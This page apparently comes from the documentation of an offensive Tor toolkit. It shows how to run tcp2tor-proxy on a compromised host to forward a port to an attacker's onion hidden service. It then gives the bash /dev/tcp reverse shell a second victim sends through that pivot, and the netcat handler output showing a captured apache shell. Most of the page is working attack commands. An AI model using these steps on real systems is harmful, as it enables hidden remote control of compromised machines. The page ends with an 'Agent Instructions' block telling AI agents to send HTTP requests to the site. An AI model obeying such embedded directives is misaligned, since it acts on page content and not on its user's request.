# Remote port forwarding with tcp2tor-proxy We suppose that Victim2 does not have Internet access, so we cannot access Tor directly from it. However, we can use **tcp2tor-proxy** in order to use Victim1 as a Tor proxy for Victim2. As shown in the following illustration, the attacker will publish a Hidden Service with a handler. With tcp2tor-proxy, Victim1 will serve a TCP port that routes the traffic directly to the Hidden Service. Then, Victim2 will send a simple reverse shell to Victim1 in order to reach the attacker handler. ![Remote port forwarding](https://3776602765-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdYqz4mHYcT7Pvv1Pvk%2F-MdhJ-bPEVjFmsFPlDC1%2F-MdhKP6otkj-JuzTnm8f%2F05_tcp2tor-proxy.png?alt=media\&token=e64cdb9b-18ec-4861-9610-adf0d9693471) ## 1. Set up the remote port forwarding {% hint style="info" %} Previously, the attacker needs to have a **Hidden Service up and running** with an associated onion address. Also, the attacker should **run a netcat handler** for the incoming connections. {% endhint %} As Victim1 is the host we will used as a pivot, we will run **tcp2tor-proxy** on it: ``` [victim1]$ ./tcp2tor-proxy -listen 0.0.0.0:60101 \ -onion-forward m5et..jyd.onion:4444 ... Proxying 0.0.0.0:60101 -> m5et..jyd.onion:4444 ``` Now, the pivot is listening TCP traffic on port `60101` so that it will be routed to the Hidden Service the attacker owns. ## 2. Reverse shell to tcp2tor-proxy As the traffic that reach tcp2tor-proxy will be routed to the Hidden Service, Victim2 only needs to send a **simple reverse shell to the pivot**: ``` [victim2]$ bash -i >& /dev/tcp/victim1/60101 0>&1 ``` After executing the above command, the attacker will receive the shell: ``` [attacker]$ nc -lnvp 1234 ... id uid=48(apache) gid=48(apache) groups=48(apache) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://atorrescogollo.gitbook.io/offensive-tor-toolkit/poc/remote-port-forwarding-with-tcp2tor-proxy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.